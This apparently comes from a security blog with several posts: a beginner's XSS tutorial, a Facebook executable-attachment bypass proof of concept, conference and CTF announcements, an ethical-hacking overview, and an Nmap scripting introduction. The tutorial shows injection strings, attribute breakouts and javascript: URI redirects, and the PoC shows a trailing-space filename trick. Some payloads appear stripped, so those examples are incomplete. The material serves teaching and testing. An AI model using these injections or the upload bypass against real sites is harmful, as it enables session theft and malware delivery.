TheKernel

Questions and Answers About XSS

thekernel — Tue, 31 Jan 2012 14:08:12 +0000

The Beginners Guide to XSS

Dear reader,

I hope that you will enjoy this paper I have written, aimed at mostly beginners within Web Application Security, but also those that needs a quick reference or a good guide to what XSS is in its simplest form. You may copy, distribute, share, adapt, change and edit as you like. You may however NOT sell this paper but including any contents in course ware, live and online training is allowed.

Best regards, MaXe

_-:: Disclaimer ::-_

By reading this disclaimer you acknowledge that the contents below are for educational purposes only. This tutorial does NOT contain actual attack code so you’ll have to make that up yourself. Furthermore, there is a lot more to Cross Site Scripting than just this article and there are many useful resources on the Internet including some of those in the references in the bottom of this article.

_ -:: Introduction ::- _

What is XSS and what does it refer to?

XSS aka Cross Site Scripting is a client-side attack where an attacker can craft a malicious link, containing script- code which is then executed within the victim’s browser when the target site vulnerable to and injected with XSS is viewed. The script-code can be any language supported by the browser but mostly HTML and Javascript is used along with embedded Flash, Java or ActiveX.

In some cases where the XSS vulnerability is persistent as described further below, the attacker will not have to craft a link as the injected script is inserted directly into the target site and / or web application. The target user(s) still has to view the affected site / page where the injected code is located though.

What can Cross Site Scripting be used for?

Cross Site Scripting can be used for a variety of things, such as session-hijacking, browser attacks, phishing, propaganda and even worms! However it still requires the victim to click a malicious link created by the attacker or browse a page with injected code. Additionally, it is also possible to execute PHP code in some cases depending on the Web Application but also how the XSS payload (script) is written. This requires a good understanding of JavaScript but also the target Web Application as well.

How could an attacker get a victim to click a XSS-link?

The easiest way to get people to click malicious links is to make them look authentic and nonmalicious. Giving them a reason afterward is the social-engineering part which should be easy except if the victim is aware of such attacks and / or has measures against Cross Site Scripting, such as NoScript.

How does an attacker avoid XSS-links looking suspicious?

This is typically done with encoding, short url services, redirects and even flash! Furthermore, in case some HTML tags are allowed on a target site, actual URLs can be hidden somewhat from the user, i.e. on many forums it is possible to craft a link this way: [URL=http://vulnerablesite.tld/index.php?call=]Free T-shirts![/URL] ( See The /* XSSOR */ link in the bottom for the most common ways to encode JavaScript. )

What types of Cross Site Scripting are there?

The most common types are GET- and POST-based XSS. However Cross Site Scripting can also be triggered via cookies. (XSS can exist in User-Agents too but this is not easy to trigger.) Additionally there is persistent and non-persistent XSS, where the non-persistent has to be triggered via a URL or via another site redirecting the XSS-request to the target vulnerable site for the user (e.g. via short url services).

The persistent XSS can be triggered just by browsing a Web Application with code injected into it. (This depends on which page has code injected, in case the target is not globally affected on all pages loaded by the user.)

What is the difference between GET- and POST-XSS?

The difference is that when GET-requests are used it is possible to conduct the usual XSS attacks where an attacker sends a maliciously crafted URL to the victim which is then executed when the victim opens the link in the browser.

With POST-requests, an attacker could e.g. use flash to send the victim to the POST-XSS vulnerable site since it is not possible to create a URL where POST-requests are in use. However, JavaScript can also be used to create a POST-based XSS request. (This requires the user to view this JavaScript some way, which then sends the POST-based XSS request.)

Are there sub-categories of Cross Site Scripting?

At the moment there’s XSSR and XSSQLI. One could say that XSRF/CSRF belongs to the same category, however the attack method differs too much from traditional Cross Site Scripting. XSSR or CSSR aka Cross Site Script Redirection is used to redirect a victim to another page unwillingly. The page can for example contain a phishing template, browser attack code or in some cases where the data or javascript URI scheme is used: session-hijacking. XSSQLI is a mix of Cross Site Scripting and SQL Injection, where an unknowing victim visits a malicious link containing SQL Injection instructions for an area on the website which requires privileges that guests or members doesn’t have. XSRF or CSRF (sometimes referred to as C-Surf) stands for Cross Site Request Forgery which is used to send automated input via the user to the target site. XSRF can in some cases be triggered just by viewing a specially crafted image tag. With Cross Site Request Forgery it may be possible to e.g. alter the password of the victim if the target site is not secured properly with Anti-CSRF tokens etc. (This prevents these automated requests.)

What is XST and can it be used for anything?

XST also known as Cross Site (Script) Tracing is a way of abusing the HTTP Trace (Debug) protocol. Anything that an attacker sends to a web-server that has TRACE enabled will send the same answer back. If an attacker sends the following:

Code:

TRACE / HTTP/1.0
Host: target.tld
Custom-header:

The attacker will receive the same “Custom-header: back allowing script execution. However after recent browser updates the following year(s) XST has been increasingly harder to control and execute properly.

How is it possible to find XSS bugs within websites?

There are 2 methods: code / script auditing or fuzzing which is described further below.

What kind of tools is required to find XSS bugs?

(REQ = Required, OPT = Optional) – REQ: An Internet Browser (such as FireFox) in case you’re fuzzing. (It is possible to do with netcat, but not advisable.) – REQ: A text-viewer (such as notepad, scite, nano etc.) in case you’re auditing. – OPT: An intercepting proxy in case you’re doing more advanced XSS. (In FireFox it is possible to use Tamper Data however Burp Suite is generally better in the long run.) – OPT: Browser Addons, for FireFox the following are especially useful: Firebug, LiveHTTP Headers, Add ‘N’ Edit Cookies, RefControl, Tamper Data and more.

What else is useful to know if One wants to find XSS bugs?

- Browser limitations regarding Cross Site Scripting [1]
- HTTP Headers and how the HTTP protocol works.
- HTML + Javascript and perhaps embedded script attacks. (flash etc.) – Intercepting proxies (Burp etc.), differential tools (meld, ExamDiff, diff, grep, etc.)
- Useful browser-addons (see FireCat [3])

- Website scanners (Nikto, W3AF, Grendel, Dirbuster, etc.)

Where is XSS-bugs typically located?

It is usually located in user submitted input either via GET- or POST-requests, where it is reflected on the target site as text outside tags, inside tag values or within javascript. It can also in some cases be submitted via cookies, http headers or in rare cases file uploads. (I.e. filenames has been possible)

How does One protect a site against XSS?

The best way is to ensure that all user input and output is validated and sanitized properly. However in some cases an IPS or WAF can also protect against XSS though the best way is still to validate (and sanitize) the user-input and -output properly. Relying on magic_quotes and other php.ini setting is generally a bad idea and not considered “best practice” options.

___ -:: Finding the Bug – With Fuzzing ::- ___

[EASY] Example Case – A:

We’re at http://buggysite.tld where we see a “Search-field” in the top-right. Since we don’t know the real source code but only the HTML-output of the site we will have to fuzz anything where it is possible to submit data.

In some cases the data will be reflected on the site and in some cases it wont. If it doesn’t we move on to the next cookie, header, GET / POST request or whatever it is that we are fuzzing.

The most effective way to fuzz is not to write: since many sites has different precautions against Cross Site Scripting. Instead we create a custom string which in most cases wont trigger anything that might alter the output of the site or render error pages that aren’t vulnerable.

An example of an effective string could be: “keyword’/\><

” ‘ /\ > and < are the most commonly used html characters used in Cross Site Scripting. However if we want to be really thorough then we could also add )(][}{% to the string that we are using to fuzz the target site.

The reason why there's not two of " or ' is because this can trigger a WAF, IPS or whatever precaution the site might have tried to implement against XSS instead of using a secure coding scheme / plan / development cycle. The reason why all characters are written as >< instead of <> is because this is a common bypass against XSS-filters!

With that in mind, we use the following string: "haxxor'/\>< to fuzz the search-field:

Lets take a look at the returned HTML-code:

HTML Code:

...

You searched for \"haxxor\'/\\>< which returned no results.

...

As we can see the input tag encoded our fuzzing string correct, however the text afterwards did not encode it properly as it only added slashes which is completely useless against Cross Site Scripting in this case.

By submitting the following string we can XSS their website: or perhaps

Of course we don't know if the following characters : ( ) and . are filtered but in most cases they're not.

Our final XSS-url could be: http://buggysite.tld/search.php?query= if GETrequests are used.

[EASY] Example Case – B:

We’re at http://yetanothersite.tld where we see another search formular.

The following is returned after our string is submitted to the search field:

HTML Code:

…

<” />
You searched for "haxxor’/\>< which returned no results.

…

In this case the string after the tag, encoded the string properly. However the string inside the tag only had slashes added which does nothing in this case. Basically we can bypass this easily with: “>

If we’re going to load external javascript we will have to avoid using ” and ‘ of course.

Our final XSS-url could be: http://yetanothersite.tld/search.php?query=”> if GET-requests are used.

[MODERATE] Example Case – C:

We’re at http://prettysecure.tld where we find yet another search field, it’s time to submit our fuzzing string.

The following HTML-code is returned after our string is submitted:

HTML Code:

…

You searched for “"haxxor’/\><” which returned no results.

… (further down)

For most people this might look secure but it really isn’t. A lot of people also overlooks potential Cross Site Scripting vectors if their string is either not output directly or encoded where they expect the XSS bug to be. This is why it is important to use a keyword that doesn’t exist on the site, such as haxxor or something better. The reason why a keyword is used is because it is searchable almost always. You can call it a XSS-locator. [1]

Anyway, back to our example. s.prop2=”\”haxxor%39/\%3E%3C”; looks secure but the flaw is that backspace aka \ is not filtered, escaped or encoded correctly. So if we write: \” it will become \\”, which will escape the first \ but not our quote. As you can see, we can’t use tags either so we’ll have to use javascript and no hard brackets (unless we use javascript, to create these for us which is possible in numerous amounts of ways).

We have of course checked that soft brackets ( ) are NOT filtered. (in some cases they can be).

By entering the following string we are able to create an alert box: \”; alert(0); s.prop500=\” This will become: s.prop2=\\”; alert(0); s.prop500=\\” when we submit the string. The reason why we add the s.prop500=\” variable to our string is because the javascript will most likely NOT execute if we don’t. We could also use comments so instead of s.prop500=\” we just use // in the end of the string.

(Whenever XSS is located within JavaScript, try to finish the script so the rest will execute properly. Think and perform this way since it will help to understand how the page functions as well without breaking it.)

In this case it is also possible to execute external javascript if One uses a bit more advanced javascript. In order to do this we can use document.write(String.fromCharCode()); where you will need a decimal converter. [The XSSOR]

Our final XSS-url could be: http://prettysecure.tld/search.php?query=\”; alert(0); s.prop500=\”

___ -:: Finding the Bug – With Auditing ::- ___

[EASY] Example Case – A:

The following file (index.php) has some interesting code:

PHP Code:

…

if($_GET['view_profile']==1) { echo $_GET['name']; … (more code) }

…

By looking at the above code we can see that if view_profile is equal to 1 then the script prints the “name” variable. An example attack URL could look like: http://testz.tld/index.php? view_profile=1&name=

[HARD] Example Case – B:

The following file (search.php) has some interesting code:

PHP Code:

…

if($_GET['set_flag']==1) { $var = “checked”; } echo “”;

…

This is a conditional vulnerability where register_globals in php.ini has to be set to On. (Off is factory default). Register_Globals basically allows the user to set variables on the fly via the browser, even if they are not meant to be set.

This only applies to variables that are NOT set as in the example above. Another problem we have encountered is htmlentities however due to a coding error we can still abuse the tag without creating a new. We will need to use event handlers in the tag and some CSS (Cascading Style Sheet) to make sure that the victim triggers the eventhandler no matter what.

There’s multiple ways of doing that, one of them is:

HTML Code:

style=’display:block;width:99999px;height:99999px;’

An eventhandler that we could use in this case could be onmouseover, even though onblur might be better.

You might ask yourself, why is the above script not secure? Because htmlentities() used that way is insecure, due to that the tag looks like this in html form:

Inside the checked value our variable ($var) is encoded, but only ” > and < are encoded, not ‘ due to ENT_QUOTES were not set in the htmlentities function. This means that we can break out of checked=” easily.

An example attack URL could be: http://was-secure.tld/search.php?test=’ style=’display:block;width:99999px;height:99999px; ‘ onmouseover=’alert(0)

There is no “Example Case – C” since I have gone through most the important of Cross Site Scripting.

___ -:: Additional Information ::- ___

XSSR

When it is possible to send a user to the data or javascript URI scheme either via A) GET- or POSTrequests or B) User submitted content such as a link then the XSSR category applies to the bug. However some individuals has claimed that a site that only accepts HTTP or HTTPS links via GETrequests also falls under the XSSR category.

An example of XSSR could be: http://somesite.tld/redirect.php? link=data:text/html, And if the Javascript URI scheme is used: http://somesite.tld/redirect.php?link=javascript:alert(0);

This has in some cases been known to leak cookies and is therefore used in session-hijacking. Additionally being able to use the javascript URI scheme in image tags on forums can be abused as well though not all browsers accepts this, but generally Internet Explorer does. (i.e.

XSSQLI

When a SQL Injection vulnerability exists within a privileged area of the target site, XSSQLI becomes plausible.

An example of XSSQLI could be tricking the administrator of “shouldbesecure.tld” to click either the SQL Injection link or click a Cross Site Scripting link which contains a call to the SQL Injection in the privileged area of the site where this could be the vulnerable part: http://shouldbesecure.tld/admin.php? del=1 AND 1=1/*

XSRF

Also known as CSRF and C-Surf, can be used against sites that doesn’t use tokens which are usually hidden inside tags. A common way to use tokens against C-Surf attacks is to hide them inside tags like:

HTML Code:

If the tokens are not random enough it might be possible to calculate these and still use C-Surf in an attack. Furthermore, if XSS is present at the target site it may also be possible to use Cross Site Scripting to read these Anti-CSRF values and thereby use them into performing automated request and bypass this protection.

References:

[1] http://ha.ckers.org/xss.html

[2] http://en.wikipedia.org/wiki/Cross-site_scripting

[3] http://firecat.intern0t.net/

Useful Tools and Other Sites:

[XSS Encoder] http://intern0t.net/xssor/

[Online Self-Test Page] http://intern0t.net/xsstutorial/

[XSS PoC Creator] http://intern0t.net/utube/

[Exploit-DB Blog] http://www.exploit-db.com/category/maxe/

[Videos / Demo's] http://www.youtube.com/user/maxel3g3nd

[HTTP Options] http://attacks.intern0t.net/htopt/

[XSS Trace] http://attacks.intern0t.net/xstrace/

Facebook Attach EXE Vulnerability – POC

thekernel — Thu, 27 Oct 2011 22:54:06 +0000

A função de mensagens privadas foi comprometida, você pode anexar um arquivo executável e enviá-lo a qualquer um, desde que você coloque um espaço após o nome do arquivo.

POC

1. Resumo:

Ao usar funcionalidade ‘Mensagens’ do Facebook, há um recurso para anexar um arquivo. Usando esse recurso, normalmente, o site não permitirá que um usuário para anexar um arquivo executável. Um bug foi descoberto para subverter essa mecanismos de segurança. Nota, você não tem que ser amigos com o usuário para lhes enviar uma mensagem com um anexo.

2. Descrição:

Ao anexar um arquivo executável, o Facebook irá retornar uma mensagem de erro dizendo:

“Upload Error: Você não pode anexar arquivos desse tipo.”

Quando fizemos o upload de um arquivo anexo para o Facebook, nos capturamos a solicitação POST enviadas para o servidor web. Dentro desta solicitação POST temos a linha:

Content-Disposition: form-data; name=”attachment”; filename=”cmd.exe”

Descobrimos que a variável ‘filename’ estava sendo analisada para determinar se o tipo de arquivo é permitido ou não.

Para subverter os mecanismos de segurança para permitir que um tipo de arquivo .exe, nós modificamos o POST, acrescentando um espaço para nossa variável filename assim:

filename=”cmd.exe “

Isso foi o suficiente para enganar o analisador e permitir que o nosso arquivo executável seja anexado e enviado em uma mensagem.

3. Impacto:

Permitir que um atacante comprometa um sistema de computador da vítima.

Creditos:

Discovered by Nathan Power – www.securitypentest.com

Global CyberLympics

thekernel — Tue, 25 Oct 2011 20:28:44 +0000

É baseado em uma competição de ataque e defesa de rede e sistemas, isso é, o time será responsável pela defesa de sua rede e em contra partida terá que atacar a rede dos outros times. A equipe pode ser composta por no mínimo de 4 e no máximo 6 membros, todos os membros do time devem ser da mesma nacionalidade.

O jogo é composto por um conjunto de objetivos que cobre os principais componentes de segurança e haverá seis diferentes categorias de objetivos que a equipe precisa completar.

Attack

Web applications

OS compromise

Exploit Hunting

Lock picking

Consiste em atacar as aplicações web, comprometer sistemas operacionais, identificar vulnerabilidades…

Defense

Keeping attackers out
Na defesa é o básico, manter seus serviços de rede em funcionamento, para cada comprometimento o time perde pontos.

Como informei em post anterior aqui na South America, o campeonato será no evento H2HC (São Paulo, Brasil), cadastre-se.

Regras gerais do game.

Boa Sorte !

Hackers To Hackers Conference (H2HC)

thekernel — Fri, 21 Oct 2011 15:00:20 +0000

Está batendo na porta a nova edição do ( excelente evento ) Hackers To Hackers Conference, mais conhecido como H2HC, que este ano ( como nos outros ) vai com certeza superar as expectativas em relação as palestras, com muitos palestrantes de peso no mundo da segurança/hacking.

O uso da palavra Hacker para se referir ao violador de segurança é uma conclusão que vem por parte dos meios de comunicação de massa.

Nós, hackers, nos recusamos a reconhecer este significado, e continuamos usando a palavra para indicar alguém que ama programar e que gosta de ser hábil e engenhoso.

Richard Stallman

O que é o evento:

Hackers To Hackers Conference (H2HC) é uma conferência organizada por pessoas que trabalham ou que estão diretamente envolvidas com pesquisas e desenvolvimento na área de segurança da informação, cujo principal objetivo é permitir a disseminação, discussão e a troca de conhecimento sobre segurança da informação entre os participantes e também entre as empresas envolvidas no evento. Com treinamentos e palestras apresentadas por membros respeitados do mundo corporativo, grupos de pesquisas e comunidade underground, neste ano a conferência promete demonstrar técnicas que nunca foram vistas ou discutidas com o público anteriormente.

Continua…

Onde:

O Hackers to Hackers Conference 8th Edition ocorrerá na Amcham Business Center São Paulo – SP, Brasil, nos dias 29 e 30 de outubro de 2011.

Capture The Flag:

Para quem gosta de desafios o CTF desse ano será diferente e muito maior, realizado na própria H2HC pela Cyberlympics que é organizado pelo EC-Council. Uma ótima iniciativa, tomara que consigamos bons resultados…

Um detalhe sobre o evento é que ele é bem técnico, então, esteja afiado nos estudos e pesquisas sobre hacking, você vai precisar

Tópicos incluídos, mas não limitados a:

Teste de Intrusão

Segurança de aplicações web

Técnicas de desenvolvimento de exploits

Segurança em telecomunicações e phone phreaking

Fuzzing e teste de Segurança de aplicações

Técnicas para desenvolvimento de software e sistemas seguros

Hardware hacking, sistemas embarcados e outros dispositivos eletrônicos

Exploração de dispositivos móveis, Symbian, P2K e tecnologia Bluetooth

Análise de vírus, worms e malwares em geral

Engenharia reversa

Rootkits

Segurança em ambientes Wi-Fi e VoIP

Informação sobre segurança em smartcard, RFID e similares

Abordagem técnica de sistemas operacionais alternativos

Ataques de negação de serviço e/ou contra-medidas

Aspectos de segurança em SCADA e ambientes industriais e redes “obscuras”

Criptografia

Lockpicking, trashing, Segurança fisica e exploração urbana

Internet, privacidade e Big Brother

Information warfare e espionagem industrial

Aconselho fortemente o comparecimento de todos (que curtem o Hacking na sua forma legítima) ao evento, não só acrescentará conhecimento como lhe dará um networking essencial.

Videocast do Coruja de TI – H2HC

Um ótimo evento a todos!

Para se tornar um hacker…

thekernel — Tue, 28 Dec 2010 23:40:55 +0000

Para se tornar um hacker, você deve preencher os seguintes requisitos:

Deve ser perito em programação e ter habilidades em redes.

Deve estar familiarizado com a pesquisa de vulnerabilidade.

Deve ter o domínio de diferentes técnicas de hacking.

Ter conhecimento profundo de plataformas alvo, como Windows, Unix, Linux, entre outros…

Conhecimento sobre a área de segurança e questões relacionadas.

Em outras palavras, você deve ser “altamente técnico” para lançar ataques sofisticados.

O que é um pesquisador de vulnerabilidades(Vulnerability Research) ?

Estudiso dinâmico de produtos e tecnologias(redes, sistema operacionais, aplicativos…), avalia e descobre vulnerabilidades.

Que podem ser classificadas com base em:

• Nível de Gravidade (baixo, médio ou alto)
• Faixa de Exploração (local ou remoto)

Por que os hackers precisam ser pesquisadores de vulnerabilidades ?

Para identificar e corrigir as vulnerabilidades da rede.

Para proteger a rede de ser atacada.

Para obter informações que ajudam a evitar problemas de segurança.

Para reunir informações sobre vírus, worms, rootkit’s…

Para encontrar pontos fracos na rede e para alertar o administrador de rede antes de um ataque.

Para saber como se recuperar de um ataque.

Vulnerability Research Websites

www.securitytracker.com

www.microsoft.com/security

www.securiteam.com

www.packetstormsecurity.com

www.hackerstorm.com

www.hackerwatch.org

www.securityfocus.com

www.securitymagazine.com

Terminologia Essencial

Ameaça:

• Uma ação ou evento que possa comprometer a segurança. Uma ameaça é uma potencial violação da segurança.

Vulnerabilidade:

• Existência de um erro ou fraqueza na execução que pode levar a um evento inesperado e indesejável e comprometer a segurança do sistema.

Alvo:

• Um sistema, produto ou componente que é identificado e submetido à umaa avaliação da segurança.

Ataque:

• Um ataque à segurança do sistema que é derivado de uma ameaça inteligente. Um ataque é qualquer ação que viola a segurança.

Exploit:

• Uma maneira de violar a segurança de um sistema através de uma vulnerabilidade.

Qualquer evento hacking irá afetar um ou mais elementos essenciais de segurança.

Segurança repousa sobre a confidencialidade, autenticidade, integridade e disponibilidade.

Confidencialidade

• A ocultação de informações ou recursos.

Autenticidade

• A identificação e a garantia da origem da informação.

Integridade

• A confiabilidade dos dados ou de recursos em termos de prevenção inadequada e alterações não autorizadas.

Disponibilidade

• A habilidade de usar as informações desejadas ou recurso.

Fases de um Pentest/Hacking Básico

Reconhecimento

• Ativo/Passivo

Scanning

• Rede, serviços, aplicativos…

Obter Acesso

• Nvel de Sistema Operacional.
• Nível de Rede.
• Nível de Aplicativo.

Manutenção do Acesso

• Upload/alteração/baixar programas ou dados.

Limpando Rastros
•

Fase 1 – Reconhecimento(Reconnaissance)

Reconhecimento refere-se a fase preparatória onde um atacante procura reunir o máximo de informações possíveis sobre um alvo antes de lançar um ataque.

Fazer uma analogia ao ato de “sacudir as maçanetas das portas” para ver se alguém está observando e respondendo. Poderia ser o futuro ponto de retorno, anotado para facilitar a entrada para um ataque, enquanto mais informações sobre o alvo é obitida em larga escala.

Tipos de Reconhecimento

Reconhecimento passivo envolve adquirir informações sem interagir diretamente com o alvo.
Reconhecimento ativo envolve a interação com o alvo diretamente por qualquer meio.

Fase 2 – Exploração(Scanning)

A fase de Scanning refere-se ao pré-ataque, quando o hacker varre a rede para obter informações específicas com base nas informações recolhidas durante a fase de reconhecimento.

Scanning inclui o uso de dialers, port scanners, network mapping, sweeping, vulnerability scanners, entre outros…

Fase 3 – Ganhar acesso(Gaining Access)

Obter o acesso refere-se à fase de penetração. O hacker explora a vulnerabilidade no sistema.

O ataque pode ocorrer através de uma LAN, internet, fraude, roubo ou furto. Exemplos incluem o buffer overflow, negação de serviço(DoS), seqüestro de sessão(session hijacking) e quebra de senhas(password cracking).

Fatores que influenciam incluem: Arquitetura e configuração do sistema alvo, o nível de habilidade do agressor, e o nível inicial de acesso obtido.

Risco: (o mais)Alto – O hacker pode ter acesso ao nível do sistema operacional, ao nível da aplicação ou de rede.

Fase 4 – Mantendo o Acesso (Maintaining Access)

Manter o acesso refere-se à fase em que o hacker tenta manter a posse do seu sistema, nessa fase, (logicamente) o hacker já comprometeu o sistema, então o Hacker já pode fazer upload, download, manipular os dados, aplicativos e configurações no sistema.

Hackers podem fazer um hardening<http://pt.wikipedia.org/wiki/Hardening> no sistema (o próprio sistema comprometido), garantindo o seu acesso exclusivo com backdoors, rootkits, cavalos de Tróia, entre outros, com o sistema configurado e devidamente seguro somente ele terá o acesso.

Fase 5 – Apagando Rastros (Covering Tracks) @não seja uma lesma

Apagando os rastros referem-se às atividades que o hacker faz para ocultar seus crimes, as razões incluem a necessidade de permanência prolongada, o uso continuado dos recursos, eliminar evidências de um hacking, ou evitar a ação legal/judicial.

Exemplos incluem Esteganografia, túneis, alterando os arquivos de log, entre muito outros…

Após isso, você pode tentar responder as seguintes perguntas:

• O que o intruso pode ver do meu sistema?
(fases de reconhecimento e exploração)

• O que um intruso pode fazer com essa informação?
(obter acesso e manter o acesso)

• Existe(no sistema alvo) alguma notificação no alvo sobre o sucesso ou tentativas de intrusão ?
(reconhecimento e apagando rastros)

Se você for contratado por qualquer organização, peça tudo que ele está tentando proteger, contra quem/o que, quais recursos e quanto está disposto a pagar a fim de ter essa/uma proteção.

Tipos de Ataques

Existem várias maneiras de um invasor obter acesso à um sistema. O atacante deve ser capaz de explorar uma fraqueza ou vulnerabilidade em um sistema.

Tipos:
Ataques ao Sistema Operacional, aplicação, código, configurações incorretas…

1. Ataques ao Sistema Operacional

Os sistemas operacionais atuais são de natureza complexa.
Os sistemas operacionais executão vários serviços, portas, modos de acesso e exigem muitos ajustes para se manter seguro.
A instalação padrão da maioria dos sistemas operacionais tem um grande número de serviços em execução e portas abertas.
Aplicação de patches e hotfixes não são fáceis em redes complexas.
Os atacantes procuram vulnerabilidades do sistema operacional para explorá-lo e ganhar acesso a um sistema de rede.

2. Ataques a Aplicações

Os desenvolvedores de software estão(sempre) em horários apertados para entregar os produtos no prazo.
Extreme Programming está em ascensão na metodologia de engenharia de software.
Os aplicativos de software vem com toneladas de funcionalidades e características.
Não existe tempo o suficiente para realizar um teste completo antes de liberar os produtos.
A segurança é muitas vezes é deixada para depois, e geralmente entregue como um componente “add-on”.
Verificação de erros pobres ou inexistentes em aplicações leva a “ataques de estouro de buffer”.

3. Ataques ao Código

Por que reinventar a roda quando você pode comprar bibliotecas e código?
Quando você instala um sistema operacional/aplicativo, ele vem com toneladas de scripts de exemplo para tornar a vida de um administrador mais fácil.

4. Ataques à Configurações Incorretas

Sistemas que deveriam ser completamente seguros são hackeados porque não foram configurados corretamente.
Os sistemas são complexos e o administrador não tem as habilidades ou recursos necessários para resolver o problema.
O Administrador vai criar uma configuração simples e que funciona. Só lembrando, que o simples em TI está totalmente longe de ser seguro.
A fim de maximizar suas chances de configurar uma máquina corretamente, remova quaisquer serviços ou software desnecessários.

Como Conduzir um Hacking (ético)

Etapa 1: Fale com o seu cliente sobre as necessidades de testes.
Etapa 2: Preparar documentos NDA e peça ao cliente assiná-lo.
Etapa 3: Preparar uma equipe de hacking e elaborar cronograma de testes.
Etapa 4: Realizar o teste.
Etapa 5: Analise os resultados e prepare um relatório.
Etapa 6: Entregue o relatório ao cliente.

Ethical Hacking Testing

Existem diferentes formas de testes de segurança. Exemplos incluem a varredura de vulnerabilidades, hacking ético e testes de penetração(pentest)

Abordagens para o teste são mostrados abaixo:

Black box

• Com nenhum conhecimento prévio da infra-estrutura a ser testada.

White box

• Com um conhecimento completo da infra-estrutura de rede a ser testada.

Gray box

• Também conhecido como teste interno. Ela examina a extensão do acesso por dentro da rede.

Relatório(Report):

• Detalhes dos resultados da atividade hacker, combinando-a contra o horário de trabalho determinada antes da fase de conduta do teste.
• As vulnerabilidades são detalhadas, medidas e prevenções são sugeridas. O Report é geralmente entregue em formato impresso, por razões de segurança.

As questões a considerar:

• Equipe, sensibilidade da informação, cláusula de Confidencialidade no contrato legal (entregando a informação certa à pessoa certa), a integridade da avaliação.

Hacktivismo

Em tempos de Wikleaiks<pt.wikipedia.org/wiki/WikiLeaks> vale umas linhas sobre hacktivismo.

Refere-se à idéia de “hacking” com ou por uma causa.
Constituído por hackers, com uma agenda social ou política.
Destina-se a enviar uma mensagem através de sua atividade “hacking” e ganhar visibilidade para sua causa.
Objetivos comuns incluem agências governamentais, empresas multinacionais, ou qualquer outra entidade identificada como nociva ou injustiçada/enganda por esses grupos ou indivíduos.
Se é um crime ganhar acesso não autorizado, não importa, o que vale é a intenção.

Classes de Hackers

Black Hats

• Indivíduos com habilidades extraordinárias(não somente em TI), recorrendo a atividades maliciosas ou destrutivas. Também conhecido como crackers(ninguém mais usa isso).

White Hats

• Os indivíduos que tem habilidades de hacker e o usa para fins defensivos. Também conhecido como analistas de segurança.

Gray Hats

• Pessoas que trabalham tanto ofensivamente e defensivamente em vários momentos.

Ultimo post do ano termina com uma frase de Neil_Armstrong: “Este é um pequeno passo para um homem, mas um grande salto para a humanidade“.

Introdução ao Nmap Scripting Engine [NSE]

thekernel — Tue, 23 Nov 2010 23:47:01 +0000

O Nmap Scripting Engine(NSE) utiliza a linguagem de programação incorporada chamada Lua(http://www.lua.org/) para criação de scripts que rodam em paralelo em um scan com Nmap, a linguagem esta bem documentada, o que torna mais fácil o aprendizado da linguagem. Alguns pontos sobre a linguagem:

Criado no Brasil em 1993, ainda em desenvolvimento.

Manual disponível gratuitamente online.

Conhecido por seu uso na indústria dos games: World of Warcraft, Crysis, etc.

Security Tools: Nmap, Wireshark, Snort 3.0

Sem buffer overflows, format string vulns, etc.

Portável: Windows, Linux, Mac, BSD, etc.

O NSE se tornou uma funcionalidade quase que indispensável do Nmap pelo seu poder e flexibilidade, permitindo a escrita e compartilhamento desses scripts, escrevendo seus próprios para atenderem às suas necessidades.

Cuidado ao rodar scripts de terceiros, verifique se é confiável(autor) ou audite cuidadosamente o script.

O NSE é ativado usando os parâmetros -sC ou –script(especifica um conjunto de scripts) os resultados são integrados nas saídas normais e/ou personalizadas(XML) do Nmap. Alguns tipos de scripts são suportados: Prerule, Service, Host e Postrule scripts.

-sC : Habilita os scripts mais comuns.
- -script= : Selecionar seus próprios scritps para execução, fornecendo categorias, nomes de arquivos de script ou nos nomes de diretórios com scripts que você quer executar. Ex. – -script=default
-A : Exame agressivo.

Pode se personalizar alguns scripts, fornecendo argumentos para eles através da opção –script-args, outras opções como –script-trace e –script-updatedb são usadas apenas para depuração e desenvolvimento de scripts.

Tipos de Script e Fases

NSE suporta quatro tipos de scripts, que se distinguem pelo tipo de alvos e fase de análise no qual eles são executados. Scripts individuais podem suportar múltiplos tipos de operação.

Prerule scripts:

Esses scripts são executados antes de qualquer uma das fases de análise do Nmap, quando o Nmap ainda não recolheu quaisquer informações sobre seus alvos.

Service Scritps:

São relacionados a certas portas abertas(serviços) no host alvo, e os resultados serão incluidos ao lado da porta, na tabela de portas da saída/resultados do Nmap.

Host Script:

Não rodam mais que uma vez em cada host alvo, um exemplo de host script é o smb-os-discovery, que coleta uma variedade de informações dos servidores SMB.

Postrule scripts:

Esses scripts são executados após o Nmap ter scaneado todos seus alvos. Eles podem ser úteis para a formatação e apresentação de saída do Nmap.

O NSE possui as seguintes tarefas:

Descoberta de Rede

Incluem a busca de dados de whois baseada no domínio alvo, na consulta à ARIN, RIPE ou APNIC sobre o IP alvo, determinar a propriedade, realização de buscas por identd em portas abertas, consultas de SNMP e listagem de compartilhamento e serviços disponíveis de NFS/SMB/RPC.

Detecção Sofisticada de Versão

O sistema de detecção de versão do Nmap é capaz de reconhecer milhares de serviços diferentes, através de seu sistema de correspondência baseado em assinaturas de provas e de expressões regulares, mas, pode não ser capaz de reconhecer tudo. Exemplo é a detecção de alguns serviços que exige duas provas independentes, pois a detecção de versão não é flexível o suficiente para tratar, por isso a detecção de versão, agora, chama o NSE para tratar de alguns serviços complicados. Links: http://nmap.org/man/pt_BR/man-version-detection.html http://nmap.org/man/pt_BR/man-os-detection.html

Detecção de Vulnerabilidades

Ainda que o Nmap não seja um examinador de vulnerabilidades(http://sectools.org/vuln-scanners.html), o NSE pode tratar das verificações de vulnerabilidades complicadas. Muitos scripts(http://nmap.org/nsedoc/categories/vuln.html) de detecção de vulnerabilidades já estão disponíveis e ficam disponíveis à medida que são escritos.

Detecção de Backdoor

Pouco tempo depois que o vírus MyDoom(com backdoor que permite reentradas posteriores) atingiu a internet, Jay Moran postou uma prova e uma assinatura de detecção de versão para o Nmap, de forma com que outros pudessem rapidamente examinar suas redes em busca de infecção pelo vírus. O NSE ajuda a detectar confiavelmente vírus e backdoors mais complexos.

Exploração de Vulnerabilidades

O NSE pode ser usado não somente para encontrar como explorar as vulnerabilidades. A capacidade de se adicionar scripts personalizados de exploração pode ser valiosa em muitos casos, em particular no penetration test. Segundo Fyodor, mesmo com essa personalização eles não(why not?) planejam transformar o Nmap em uma estrutura de exploração como o Metasploit.

Como a capacidade do ser humano de inventar sempre há novos scripts interessantes, e é isso que esperam que usuários do Nmap façam.

Categorias de Scripts

Os scripts NSE definem uma lista de categorias a que pertencem. As categorias são:

Auth(de autenticação)

Default(omissivos)

Discovery(de descoberta)

External(externos)

Intrusive(intrusivos)

Malware

Safe(seguros)

Version(de versão)

Vul(de vulnerabilidade)

Os nomes das categorias não são case sensitive.
